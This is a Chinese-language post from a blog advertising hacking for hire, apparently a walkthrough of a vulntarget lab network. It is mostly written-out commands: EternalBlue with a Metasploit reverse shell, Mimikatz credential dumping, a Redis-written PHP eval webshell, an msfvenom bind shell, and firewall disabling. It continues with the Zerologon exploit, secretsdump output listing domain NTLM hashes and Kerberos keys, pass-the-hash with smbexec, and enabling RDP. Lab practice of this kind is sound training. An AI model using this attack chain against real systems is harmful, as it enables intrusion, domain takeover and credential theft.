Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86395816

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking

网络配置

外网WIN7:ip1: 192.168.127.91/255.255.255.0 ,gw:192.168.127.2 (NAT模式)ip2:10.0.20.98-vmnet1(仅主机模式)域主机成员:10.0.20.99-vmnet1(仅主机模式)10.0.10.111-vmnet2(仅主机模式)域控:10.0.10.110-vmnet2(仅主机模式)密码配置:Win7:win7/adminwin2016:Administrator/Admin@123、vulntarget.com\win2016   Admin#123win2019:vulntarget.com\administrator   Admin@666

信息收集

扫描主机

arp-scan  -l扫描同一网段中的存活主机a0fgwy0hflv14995.png发现一个存活主机:192.168.127.91

扫描端口

扫描一下存活靶机的ip地址

nmap -sC -T4 192.168.127.91ca1b24ejxaw14997.png发现目标系统为win7,且开放了445端口,尝试利用永恒之蓝(ms17-010)打一波目标系统

内网主机渗透

kali中输入命令:msfconsolemsf 6> search 17-010msf 6> use 0msf 6> set payload windows/x64/meterpreter/reverse_tcpmsf 6> set lport 6666msf 6> set lhost 192.168.127.129msf 6> set rhosts  192.168.127.91msf 6> run5ioxe4pagvk14998.pngmeterpreter>shell  C:\Windows\System32>ipconfigy4y22uskfhs15000.png发现有些乱码,直接在设置一下
C:\Windows\System32>CHCP 65001     #65001 UTF-8代码页C:\Windows\System32>ipconfig  #发现有两个网段,一个是192.168.127的网段,另一个就是10.0.20网段bvpapnvephh15001.pngC:\Windows\System32>whomai  #查看当前用户得权限为system权限byfoge1rxil15002.pngC:\Windows\System32>tasklist/svc  #查看进程,发现系统中没有杀软2bj5b0farrc15005.pngC:\Windows\System32>exit #退出shell命令终端tige3tyfsc515006.pngmeterpreter>load kiwi  #加载mimikataz模块meterpreter>creds_all  #获取当前所有用户得登录凭证,发现用户名为win7,密码为:adminz4b5cwupf1x15007.png


Web渗透

直接访问,http://192.168.127.91/,发现是通达OAxx3jkhcqqrg15016.jpg查看通达OA的版本号,当前版本为11.3http://192.168.127.91/inc/expired.php xsbd50npz5r15017.png通过搜索引擎搜索通达11.3存在文件包含漏洞参考地址:https://blog.csdn.net/hackzkaq/article/details/115900500这里使用一键图形化工具获得webshelljlm43op0gga15020.png使用蚁剑连接成功c4qa1n5rsgq15021.pngpfmfnjiojob15023.png同样在蚁剑的命令终端下查看当前用户的权限为system权限yosahnkciwi15026.png

横向渗透

进程迁移获得shell时,该shell是极其脆弱,所以需要移动这个shell把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作,这样使渗透更难被检测到。自动迁移进程命令(run post/windows/manage/migrate)后,系统会自动寻找合适的进程然后迁移meterpreter > run post/windows/manage/migrate   #从1080的spoolsv.exe迁移到了noepad.exe的4800进程jb5pdpgnh2z15029.png查看本地网络连接子网段meterpreter > run  get_local_subnetsc3eytl5strj15030.png添加一条动态路由meterpreter > run autoroute -s 10.0.20.0/24或者meterpreter >backgroundmeterpreter >sessions
msf6 exploit(windows/smb/ms17_010_eternalblue) >use post/multi/manage/autoroutemsf6 exploit(windows/smb/ms17_010_eternalblue) >set session 1msf6 exploit(windows/smb/ms17_010_eternalblue) >runfa4y1aafyly15033.pngmeterpreter >backgroundhxcmga0kttq15035.png发现存活主机msf6 exploit(windows/smb/ms17_010_eternalblue) >use post/windows/gather/arp_scannermsf6 exploit(windows/smb/ms17_010_eternalblue) >set session 1msf6 exploit(windows/smb/ms17_010_eternalblue) >set rhosts 10.0.20.1-254msf6 exploit(windows/smb/ms17_010_eternalblue) >runyevrqfxnamq15037.png发现了另一台存活主机10.0.20.99开启socks5代理
msf6 exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/server/socks_proxymsf6 auxiliary(server/socks_proxy) > runns4dvm3hmpk15039.pnggkcfnscnqdd15041.png

端口扫描

首先先要需要修改/etc/proxychain4.conf配置文件

vim   /etc/proxychains4.confsocks5  127.0.0.1  1080通过nmap扫描目标IP的常用端口proxychains nmap -sT -Pn 10.0.20.99 -p22,23,80,139,445,1433,3306,3389,6379,8080ek0lz3sui3q15043.png发现10.0.20.99主机开放了6379和80端口这里使用本地socks5代理客服端proxifier软件ijsoqdqxvgb15045.png通过dirsearch进行扫描,发现目标存在phpinfo.php敏感信息页面python3   dirsearch.py  -l url.txt  -t 10  -e *   -i 200,302  --format csv -o C:\Users\backlion\Desktop\dirsearch-master\xxx.com.csv或者攻击机kali下执行
proxychains python dirsearch.py -u http://10.0.20.99 -i 200
proxychains dirsearch -u “http://10.0.20.99” --proxy=socks5://127.0.0.1:1080 -t 5
rzvnfdm2esr15046.png访问phpinfo.php页面发现暴露了网站的绝对路径:C:/phpStudy/PHPTutorial/WWW/http://10.0.20.99/phpinfo.php rik4o3lxuqy15050.png
http://10.0.20.99/l.php1s2qjz3azo415053.png

Redis未授权访问

通过 redis-cli 命令可无密码进行远程连接proxychains redis-cli -h 10.0.20.99lx2moizdnzh15055.png

Redis写入webshell

10.0.20.99:6379> CONFIG set dir "C:/phpStudy/PHPTutorial/WWW/"  #切换到可写入shell的绝对路径10.0.20.99:6379> set x "\n\n\n<?php @eval($_POST['x']);?>\n\n\n"   #写入一句话木马10.0.20.99:6379> config set dbfilename shell.php  #设置文件名为shell.php10.0.20.99:6379> savehwafyuszvj115057.png这里通过本地主机上的蚁剑设置代理,且连接webshell0jsc4w0rhjo15058.png
zym13fdu4oj15060.pngdvwmhw1chnl15061.png查看当前用户权限为syestemfeosdllk2kp15062.png

上传MSF后门

生成正向shellcodemsfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=3333 -f exe > shell.exeyg2upi02tri15065.png使用蚁剑上传shell.exe到10.0.20.99,并执行ktfcmx1txbf15066.png

配置监听器

use exploit/multi/handlerset payload windows/x64/meterpreter/bind_tcpset lport 3333set RHOST 10.0.20.99runlysu35c1pjc15067.png
关闭防火墙
netsh firewall set opmode mode=disable
4ykyxdcd4sz15068.png蚁剑命令终端中运行shell.exedfkttzy4rtp15070.jpg收集同网段主机meterpreter > arps4jkgaqpnnd15071.png扫出10.0.10.110网段迁移进程
run post/windows/manage/migrate
yaii4gfb52x15078.pngmeterpreter > sysinfo5vzoisyzmqb15079.pngmeterpreter > shell3xfcupz0f4r15080.pngC:\phpStudy\PHPTutorial\WWW>CHCP 65001jyjbvykpde215081.png收集IP信息C:\phpStudy\PHPTutorial\WWW>ipconfig/alln0it1iwzywl15083.pngwa3jqkkj24i15084.png有域存在,查看域控计算机名C:\phpStudy\PHPTutorial\WWW>net group "domain controllers" /domaind0pwli0hxll15086.png查看域管理员C:\phpStudy\PHPTutorial\WWW>net group "enterprise admins" /domaingouy4oeoflo15090.png
域提权
添加路由meterpreter > run post/multi/manage/autoroutemeterpreter > run autoroute -p4r0ohgnjpr115093.pngmeterpreter > run post/windows/gather/enum_domaindodaqcwfey115098.pngproxychains4 nmap -Pn -sT 10.0.10.110 -p6379,80,8080,445,139pboygz5el1k15104.png下载impacket包,并进行安装git clone https://github.com/SecureAuthCorp/impacketcd impacketpython3 -m pip install -r requirements.txtpython3 -m pip install .下载CVE-2020-1472EXPgit clone  https://github.com/dirkjanm/CVE-2020-1472.gitcd CVE-2020-1472执行EXPproxychains python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110miwkpurrdhx15108.png获取域管理员hashcd  /opt/impacket/examplesproxychains python3 secretsdump.py vulntarget.com/WIN2019\$@10.0.10.110 -no-passi1pxt5rfi3x15114.pngAdministrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:d0b248a756f62bbef5b286c7be19c7a9:::[*] Kerberos keys grabbedAdministrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51dAdministrator:aes128-cts-hmac-sha1-96:04c435638a00755c0b8f12211d3e88a1Administrator:des-cbc-md5:dcc29476a789ec9ekrbtgt:aes256-cts-hmac-sha1-96:f7a968745d4f201cbeb73f4b1ba588155cfd84ded34aaf24074a0cfe95067311krbtgt:aes128-cts-hmac-sha1-96:f401ac35dc1c6fa19b0780312408cdedkrbtgt:des-cbc-md5:10efae67c7026dbfvulntarget.com\win2016:aes256-cts-hmac-sha1-96:e4306bef342cd8215411f9fc38a063f5801c6ea588cc2fee531342928b882d61vulntarget.com\win2016:aes128-cts-hmac-sha1-96:6da7e9e046c4c61c3627a3276f5be855vulntarget.com\win2016:des-cbc-md5:6e2901311c32ae58WIN2019$:aes256-cts-hmac-sha1-96:092c877c3b20956347d535d91093bc1eb16b486b630ae2d99c0cf15da5db1390WIN2019$:aes128-cts-hmac-sha1-96:0dca147d2a216089c185d337cf643e25WIN2019$:des-cbc-md5:01c8894f541023bcWIN2016$:aes256-cts-hmac-sha1-96:414bc47994e3bf616da9e115ba8c7e528ce17315734337479d6f67df3ca6e682WIN2016$:aes128-cts-hmac-sha1-96:8b30d9d37e7f7f474124382d2fe75950WIN2016$:des-cbc-md5:6d97313875e362c8拿到管理员hash,执行提权exp
proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15  Administrator@10.0.10.110
34u5karvuja15120.png开启3389远程桌面端口:reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
直接3389登录:proxychains  rdesktop 10.0.10.110
账号:balsec.com\administrator   密码:Admin@666
ypd0pruzobk15124.jpg